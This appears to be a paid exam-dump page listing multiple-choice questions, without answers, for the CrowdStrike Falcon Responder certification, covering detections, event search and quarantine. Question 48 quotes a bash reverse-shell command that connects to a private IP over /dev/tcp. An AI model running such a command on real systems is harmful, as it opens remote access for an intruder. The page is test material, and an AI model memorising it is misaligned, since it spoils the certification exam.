Summer Certification Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: clap70

CCFR-201b CrowdStrike Certified Falcon Responder Questions and Answers

Questions 4

What happens when a quarantined file is released?

Options:

A.

It is moved into theC:\CrowdStrike\Quarantine\Releasedfolder on the host

B.

It is allowed to execute on the host

C.

It is deleted

D.

It is allowed to execute on all hosts

Buy Now
Questions 5

What action is needed to ensure Falcon does not block or generate a detection for a process by using the file hash?

Options:

A.

Create a Custom IOC with an action of allow for the hash

B.

Create a Machine Learning Exclusion with an action of allow for the hash

C.

Create a Custom IOA with an action of allow for the hash

D.

Create an IOA Exclusion with an action of allow for the hash

Buy Now
Questions 6

When looking at the details of a detection, there are two fields called Global Prevalence and Local Prevalence. Which answer best defines Local Prevalence?

Options:

A.

Local prevalence is the frequency with which the hash of the triggering file is seen across the entire Internet

B.

Local Prevalence tells you how common the hash of the triggering file is within your environment (CID)

C.

Local Prevalence is the Virus Total score for the hash of the triggering file

D.

Local prevalence is the frequency with which the hash of the triggering file is seen across all CrowdStrike customer environments

Buy Now
Questions 7

What is the difference between Managed and Unmanaged Neighbors in the Falcon console?

Options:

A.

A managed neighbor is currently network contained and an unmanaged neighbor is uncontained

B.

A managed neighbor has an installed and provisioned sensor

C.

An unmanaged neighbor is in a segmented area of the network

D.

A managed sensor has an active prevention policy

Buy Now
Questions 8

Refer to the image.

In the Full Detection View while viewing the Process Tree you see an attack outlined as in the image above.

Based on what you see, what happened during the attack?

Options:

A.

The attacker launched a command prompt, renamed binaries, executed malware, and prepared exfiltration

B.

The attacker launched a command prompt to establish a reverse shell to grant remote code execution capabilities

C.

The attacker executed malware, renamed binaries, prepared exfiltration, and deleted backups to prevent recovery

D.

The attacker launched a command prompt, enumerated the host, created persistence, and deleted backups to prevent recovery

Buy Now
Questions 9

Which Executive Summary dashboard item indicates sensors running with unsupported versions?

Options:

A.

Detections by Severity

B.

Inactive Sensors

C.

Sensors in RFM

D.

Active Sensors

Buy Now
Questions 10

During an advanced hunting session, a responder is writing a custom query in the Event Search tool to track the lineage of a suspicious process. They notice a field labeled TargetProcessId_decimal. Which of the following sentences accurately describes the technical significance of this value within the CrowdStrike telemetry ecosystem?

Options:

A.

It is the standard Process ID (PID) assigned by the Windows Task Manager.

B.

It is a sensor-assigned, environment-wide unique decimal identifier for that specific process instance.

C.

It represents the memory offset where the process ' s primary thread began.

D.

It is a count of the total number of child processes spawned by that executable.

Buy Now
Questions 11

When is a SyntheticProcessRollup2 event type found?

Options:

A.

When events are combined with analyst-found contextual information

B.

When events are updated manually by the OverWatch team

C.

When events are recorded with Charlotte AI interactions

D.

When events are generated for a process that started before the sensor

Buy Now
Questions 12

What does pivoting to an Event Search from a detection do?

Options:

A.

It gives you the ability to search for similar events on other endpoints quickly

B.

It takes you to the raw Insight event data and provides you with a number of Event Actions

C.

It takes you to a Process Timeline for that detection so you can see all related events

D.

It allows you to input an event type, such as DNS Request or ASEP write, and search for those events within the detection

Buy Now
Questions 13

You are reviewing the raw data in an Event Search from a detection tree. You find a DnsRequest event and want to determine whether any other DNS requests were performed by the original process.

Which two field values do you need from this event to perform a Process Timeline search?

Options:

A.

ParentProcessId and aid

B.

ResponsibleProcessId and aid

C.

RequestType and aid

D.

ContextProcessId and aid

Buy Now
Questions 14

An adversary is attempting to disable security features by modifying the system registry. Which of the following native Windows processes is specifically designed to create, modify, and delete Registry keys via the command line?

Options:

A.

reg.exe

B.

taskmgr.exe

C.

lsass.exe

D.

svchost.exe

Buy Now
Questions 15

Your lead analyst instructs you to dump the kernel memory of a Windows system using Real Time Response (RTR).

Which native RTR command best helps you to quickly achieve the task?

Options:

A.

CSWINDIAG

B.

dumpmem

C.

xmemdump

D.

memdump

Buy Now
Questions 16

A SOC Manager is reviewing the monthly efficiency of the incident response team. They are specifically analyzing how many alerts were handled by each individual analyst and the ratio of legitimate threats to noise to optimize staffing levels. While navigating the Detection Resolutions Dashboard, which of the following metrics would they NOT find, as it is primarily located within the Activity or Executive summary dashboards?

Options:

A.

Detections by user (Analyst performance)

B.

Total Detections by Host

C.

Total count of False Positives

D.

Detection resolution status breakdown

Buy Now
Questions 17

Bulk Search tools have several features in common. Which of the following is incorrect as a feature common to all Bulk Search types?

Options:

A.

They allow for searching multiple items (up to 500) at once.

B.

Regular Expressions (Regex) are allowed within the search fields.

C.

Search results can be exported for further analysis.

D.

They search across historical telemetry in the cloud.

Buy Now
Questions 18

While investigating a detection, how can you identify all other processes that may have run on the host around the time of an event?

Options:

A.

Run a Process Search in the Investigate app and specify a hostname and time range

B.

Run a Process Timeline in the Investigate app and specify a hostname and time range

C.

Run a Host Search with a specified hostname and time range

D.

Click Full Detection Details to see a Process Tree and then specify a time range

Buy Now
Questions 19

When an organization needs to detect a specific behavior that is unique to their environment, they can create a Custom IOA. Which of the following is NOT required when configuring a custom IOA from scratch?

Options:

A.

Selecting a Rule Type (e.g., Process Creation).

B.

Specifying the Severity level of the resulting detection.

C.

Assigning a specific host group to the IOA rule at the time of creation.

D.

Providing a unique name for the rule.

Buy Now
Questions 20

You are concerned that a compromised user may have run multiple malicious commands across multiple hosts.

What information from Investigate > Search > Users will help you quickly find evidence of this behavior?

Options:

A.

Detect history

B.

User logon activities

C.

File-transfer port activities

D.

Admin tool usage

Buy Now
Questions 21

While reviewing the ' Detection Method ' field for a high-severity alert, a responder sees the label ' Post-Exploit ' . This terminology is used by CrowdStrike to identify a specific:

Options:

A.

Falcon Detection Method

B.

MITRE Tactic

C.

Indicator of Attack (IOA)

D.

Prevention Policy Level

Buy Now
Questions 22

Which tool or search type is recommended as the " best search " to use when performing the " Examine what ' s normal for this system " step in an investigation?

Options:

A.

User Search

B.

Host Search

C.

Hash Search

D.

IP Search

Buy Now
Questions 23

When a responder chooses to ' Release ' a file from quarantine because it was determined to be a false positive, what type of allowlist is automatically created in the background?

Options:

A.

Filename-based allowlist

B.

Hash-based allowlist

C.

Path-based allowlist

D.

Command-line allowlist

Buy Now
Questions 24

A responder releases a file from quarantine on a specific workstation. What is the default scope of the allowlist that is created during this process?

Options:

A.

Global (applies to all hosts in the environment)

B.

Only the specific host where the file was originally quarantined

C.

All hosts within the same host group as the source host

D.

All hosts running the same operating system version

Buy Now
Questions 25

From the Detections page, how can you view ' in-progress ' detections assigned to Falcon Analyst Alex?

Options:

A.

Filter on ' Analyst: Alex '

B.

Alex does not have the correct role permissions as a Falcon Analyst to be assigned detections

C.

Filter on ' Hostname: Alex ' and ' Status: In-Progress '

D.

Filter on ' Status: In-Progress ' and ' Assigned-to: Alex*

Buy Now
Questions 26

The User Search results are organized into several categories. Which of the following is NOT a sub-heading in the User Search?

Options:

A.

User Logons

B.

Unique Executables Written

C.

Admin tool usage

D.

Network Connections

Buy Now
Questions 27

Which of the following is NOT a valid event type?

Options:

A.

StartofProcess

B.

EndofProcess

C.

ProcessRollup2

D.

DnsRequest

Buy Now
Questions 28

During a targeted investigation into a potentially compromised internal administrative account, a responder utilizes the User Search functionality within the Investigate menu. The goal is to identify if the account was leveraged to drop or launch unauthorized binaries across multiple systems in the environment. Which specific data category is natively visible in the User Search results to facilitate this check?

Options:

A.

Registry Key Operations

B.

Network File Transfer ports

C.

Unique Executables Written and Process Executions

D.

BIOS and Hardware modification logs

Buy Now
Questions 29

When analyzing the raw telemetry for a ' DNSRequest ' event, which of the following raw data fields is available to the responder?

Options:

A.

browser_type

B.

index

C.

cpu_usage_percent

D.

monitor_mode

Buy Now
Questions 30

Refer to the image.

You are using Advanced Event Search to find the event record for a suspicious network connection.

Using the Event List Interactions button for the event, indicated by the arrow in the image above, which option will show all contextual event data around the process execution being investigated?

Options:

A.

Show Responsible Process Data

B.

Inspect

C.

Show +/- 10-minute windows of events

D.

Investigate Host

Buy Now
Questions 31

What happens when you create a Sensor Visibility Exclusion for a trusted file path?

Options:

A.

It excludes host information from Detections and Incidents generated within that file path location

B.

It prevents file uploads to the CrowdStrike cloud from that file path

C.

It excludes sensor monitoring and event collection for the trusted file path

D.

It disables detection generation from that path, however the sensor can still perform prevention actions

Buy Now
Questions 32

If a local administrator needs to inspect the quarantine directory directly on a machine, where are quarantine files located on a Windows Endpoint?

Options:

A.

C:\Temp\CrowdStrike\Quarantine

B.

C:\Windows\System32\Drivers\CrowdStrike\Quarantine

C.

C:\Program Files\CrowdStrike\Quarantine

D.

C:\Users\Public\CrowdStrike\Quarantine

Buy Now
Questions 33

What is an advantage of using a Process Timeline?

Options:

A.

Process related events can be filtered to display specific event types

B.

Suspicious processes are color-coded based on their frequency and legitimacy over time

C.

Processes responsible for spikes in CPU performance are displayed overtime

D.

A visual representation of Parent-Child and Sibling process relationships is provided

Buy Now
Questions 34

Which of the following tactic and technique combinations is sourced from MITRE ATT AND CK information?

Options:

A.

Falcon Intel via Intelligence Indicator - Domain

B.

Machine Learning via Cloud-Based ML

C.

Malware via PUP

D.

Credential Access via OS Credential Dumping

Buy Now
Questions 35

How are processes on the same plane ordered (bottom ' VMTOOLSD.EXE ' to top CMD.EXE ' )?

Options:

A.

Process ID (Descending, highest on bottom)

B.

Time started (Descending, most recent on bottom)

C.

Time started (Ascending, most recent on top)

D.

Process ID (Ascending, highest on top)

Buy Now
Questions 36

Which of the following sentences best describes the primary use of the ' Hash Executions ' Search (Bulk Search)?

Options:

A.

It allows a responder to upload a file to the cloud for detonating in a sandbox.

B.

It allows for a summary view of the environment-wide presence of a given list of multiple hashes.

C.

It allows an administrator to block a single hash across all machines.

D.

It provides a detailed process tree for every execution of a single hash.

Buy Now
Questions 37

The Falcon console is divided into several modules. Timelines (Host and Process) are technically a part of which Falcon page?

Options:

A.

Activity

B.

Investigate

C.

Configuration

D.

Dashboards

Buy Now
Questions 38

Analyze the following process lineage observed during a detection triage on a Windows 10 workstation:

root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe.

Based on the fact that the suspicious process originated from the user ' s desktop shell environment (explorer.exe), what is the most likely entry vector for this attack?

Options:

A.

Remote exploitation of a system service

B.

User execution via a Phishing email or drive-by download

C.

Malicious persistence via a WMI event subscription

D.

Credential theft through a compromised Domain Controller

Buy Now
Questions 39

Executive dashboards provide a high-level view of security. Which of the following CANNOT be seen from the Executive Summary Dashboard?

Options:

A.

Detections broken down by Tactic.

B.

A breakdown of Agent Versions across the fleet.

C.

The top 10 hosts with the most detections.

D.

The organization’s current CrowdScore trend.

Buy Now
Questions 40

CrowdStrike provides ' Overwatch Best Practices ' for triaging alerts. According to these guidelines, what is the next step a responder should take immediately after the ' Understand the detection ' step?

Options:

A.

Isolate the host from the network.

B.

Review the process tree to understand the origin of the activity.

C.

Perform an OSINT search for the suspicious hash.

D.

Resolve the detection as a True Positive.

Buy Now
Questions 41

Which option indicates a hash is allowlisted?

Options:

A.

No Action

B.

Allow

C.

Ignore

D.

Always Block

Buy Now
Questions 42

You found a list of SHA256 hashes in an intelligence report and search for them using the Hash Execution Search. What can be determined from the results?

Options:

A.

Identifies a detailed list of all process executions for the specified hashes

B.

Identifies hosts that loaded or executed the specified hashes

C.

Identifies users associated with the specified hashes

D.

Identifies detections related to the specified hashes

Buy Now
Questions 43

Responders often use Process Explorer to visualize process behavior. Which of the following is NOT a valid way to pivot to a Process Explorer view?

Options:

A.

From Detection > Top Right Drop Down > View as Process Activity

B.

From Configuration > Prevention Policies > View Process Explorer

C.

From Event Search > Click on a specific Process ID

D.

From Host Search > Processes and Services list

Buy Now
Questions 44

When examining raw event data, what is the purpose of the field called ParentProcessld_decimal?

Options:

A.

It contains an internal value not useful for an investigation

B.

It contains the TargetProcessld_decimal value of the child process

C.

It contains the Sensorld_decimal value for related events

D.

It contains the TargetProcessld_decimal of the parent process

Buy Now
Questions 45

How long are quarantined files stored in the CrowdStrike Cloud?

Options:

A.

45 Days

B.

90 Days

C.

Days

D.

Quarantined files are not deleted

Buy Now
Questions 46

When reviewing open detections, what method should be used to identify the most relevant related information in the environment?

Options:

A.

Host Management grouping by host, organizational unit, or prevention policy

B.

Grouping detections by command line, host, hash, or triggering file

C.

Review the Detection Resolutions dashboard

D.

Sort detections by Time: Oldest to Newest

Buy Now
Questions 47

How long does detection data remain in the CrowdStrike Cloud before purging begins?

Options:

A.

90 Days

B.

45 Days

C.

30 Days

D.

14 Days

Buy Now
Questions 48

Refer to the image.

Command line:

/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line in the image above.

Based on the command line, what is the next step you should take?

Options:

A.

Investigate the host for manipulation of the root folder

B.

Investigate the host for any Potentially Unwanted Programs (PUP)

C.

Investigate the host for an interactive remote terminal

D.

Investigate the host for developer activity

Buy Now
Questions 49

A responder is looking at event telemetry and sees an event named ' ProcessRollup2 ' . Which sentence best describes what this event type represents?

Options:

A.

An existing process was terminated by the user.

B.

A new process was created and started on the endpoint.

C.

A process successfully established a network connection.

D.

A process modified a sensitive registry key.

Buy Now
Questions 50

Which of the following statements about the ' Detection Activity ' report is FALSE?

Options:

A.

It provides a summary of all alerts over a selected time period.

B.

It can be filtered by host name or severity.

C.

Clicking on a ProcessID value within the report pivots to a pre-populated Event Search.

D.

The report can be exported to a CSV file.

Buy Now
Questions 51

Falcon uses specific identifiers to track processes across the environment. Which of the following sentences best describes what the ' TargetProcessId_decimal ' raw data represents?

Options:

A.

The standard Process ID (PID) assigned by the Windows operating system.

B.

A sensor-assigned decimal number that is unique for each process across time and hosts.

C.

The memory address where the process’s executable is loaded.

D.

The total number of seconds the process has been running.

Buy Now
Questions 52

Where can you find hosts that are in Reduced Functionality Mode?

Options:

A.

Event Search

B.

Executive Summary dashboard

C.

Host Search

D.

Installation Tokens

Buy Now
Questions 53

What action is used when you want to save a prevention hash for later use?

Options:

A.

Always Block

B.

Never Block

C.

Always Allow

D.

No Action

Buy Now
Questions 54

What must be true about a custom script before it can be executed from within a Fusion SOAR Workflow?

Options:

A.

The Response Policy must allow for the execution of Workflows

B.

The script must exist on the host locally

C.

The script must contain input and output JSON fields

D.

The Share with workflows option must be enabled for the custom script

Buy Now
Questions 55

An analyst notices a detection that has been automatically flagged with the ' New Activity ' status. Which of the following statements best describes what this status indicates?

Options:

A.

A brand new detection has been triggered on a host that was recently added to the network.

B.

A detection that was previously moved to a resolved status has generated new telemetry and activity.

C.

A user has logged into a machine for the first time since the sensor was installed.

D.

The Falcon Overwatch team has manually verified that the detection is an active threat.

Buy Now
Questions 56

In the Falcon console, detections can be automated or manual. Which of the following options represents a manual detection?

Options:

A.

A detection triggered by the Machine Learning engine.

B.

A Falcon Overwatch-pushed detection.

C.

A detection based on a Custom IOA.

D.

A detection matched against a known Intelligence IOC.

Buy Now
Questions 57

In various telemetry events like ' FileWrite ' or ' NetworkConnect ' , Falcon identifies the process that performed the action. Which field will always identify this " acting " process?

Options:

A.

ContextProcessId_decimal

B.

TargetProcessId_decimal

C.

ParentProcessId_decimal

D.

OwnerProcessId_decimal

Buy Now
Questions 58

To maintain a logical flow during an incident post-mortem, CrowdStrike recommends describing adversary activity using a specific three-part sentence structure. Which combination best completes this sentence: " The adversary was trying to [1], by [2] , using [3] " ?

Options:

A.

< Technique > , < Tactic > , < Objective >

B.

< Objective > , < Tactic > , < Technique >

C.

< Objective > , < Technique > , < Tactic >

D.

< Tactic > , < Objective > , < Technique >

Buy Now
Questions 59

Detections in Falcon are classified by their origin. Which of the following is NOT a recognized type of detection?

Options:

A.

Machine Learning

B.

Behavioral

C.

Intelligence

D.

Custom IOA

Buy Now
Questions 60

Filtering the ' Detection Activity ' report is useful for identifying specific threats. Which of the following filters can not be used on ' Detection Activity ' ?

Options:

A.

Severity

B.

Hash Value

C.

Detection Type

D.

Status

Buy Now
Questions 61

How does a DNSRequest event link to its responsible process?

Options:

A.

Via both its ContextProcessld__decimal and ParentProcessld_decimal fields

B.

Via its ParentProcessld_decimal field

C.

Via its ContextProcessld_decimal field

D.

Via its TargetProcessld_decimal field

Buy Now
Questions 62

When navigating the ' Custom IOA ' creation wizard, a user must select a rule type. Which of the following is NOT a valid IOA rule type available for selection?

Options:

A.

Process Creation

B.

File Creation

C.

Domain Name

D.

Scheduled Task

Buy Now
Exam Code: CCFR-201b
Exam Name: CrowdStrike Certified Falcon Responder
Last Update: Aug 19, 2026
Questions: 209
CCFR-201b pdf

CCFR-201b PDF

$25.5  $84.99
CCFR-201b Engine

CCFR-201b Testing Engine

$30  $99.99
CCFR-201b PDF + Engine

CCFR-201b PDF + Testing Engine

$40.5  $134.99